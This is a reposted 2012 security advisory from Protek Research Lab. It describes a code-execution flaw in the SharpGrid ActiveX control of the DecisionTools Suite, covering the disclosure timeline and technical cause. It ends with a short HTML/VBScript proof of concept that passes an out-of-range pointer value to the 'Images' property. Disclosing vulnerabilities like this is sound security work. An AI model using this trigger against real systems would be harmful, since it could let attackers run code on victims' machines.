首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DecisionTools SharpGrid ActiveX Control RCE
来源:http://www.protekresearchlab.com/ 作者:Provencher 发布时间:2012-05-10  

#####################################################################################

Application:   DecisionTools SharpGrid ActiveX Control Code Execution Vulnerability
Platforms:     Windows
Secunia:       SA48571 
Date:          2012-05-09
Author:        Francis Provencher (Protek Research Lab's)
Website:       http://www.protekresearchlab.com/
Twitter:       @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC


#####################################################################################

===============
1) Introduction
===============
The DecisionTools Suite is an integrated set of programs for risk analysis and decision making
under uncertainty that runs in Microsoft Excel. The DecisionTools Suite includes @RISK for
Monte Carlo simulation, PrecisionTree for decision trees, and TopRank for “what if” sensitivity analysis.
In addition, the DecisionTools Suite comes with StatTools for statistical analysis and forecasting,
NeuralTools for predictive neural networks, and Evolver and RISKOptimizer for optimization.
All programs work together better than ever before, and all integrate completely with
Microsoft Excel for ease of use and maximum flexibility.
 
http://www.palisade.com/decisiontools_suite/
#####################################################################################

============================
2) Report Timeline
============================

2012-03-26  Vulnerability reported to Secunia
2012-05-09  Publication of this advisory


#####################################################################################

============================
3) Technical details
============================
 
The vulnerability is caused due to the "Images" property in the SharpGrid ActiveX control
insecurely using the assigned value as an image list pointer and can be exploited to call a
virtual function within an arbitrary memory location.
 

#####################################################################################

===========
4) POC
===========

<object classid='clsid:5BAADB36-D13B-4708-B8E6-7FACF1BF6783' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Common Files\Data Dynamics\Sharpgrid\sg20u.ocx"
prototype  = "Property Let Images As Long"
memberName = "Images"
progid     = "DDSharpGrid2U.SGGrid"
argCount   = 1
arg1=2147483647
target.Images = arg1

</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Guitar Pro 6.1.1 r10791 (.gpx)
·Asterisk 'ast_parse_digest()'
·thinkphp remote exploit
·PHP 5.4 (5.4.3) Code Execution
·Mozilla Firefox 7 / 8 Out-Of-B
·Adobe Photoshop CS5.1 U3D.8BI
·WikkaWiki 1.3.2 Spam Logging P
·Guitar Pro 6.1.1 r10791 (.gpx)
·Distinct TFTP 3.01 Writable Di
·URL Hunter 3.1.2.1 [.m3u] stac
·AnvSoft Any Video Converter 4.
·Drupal 0-day Denial Of Service
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved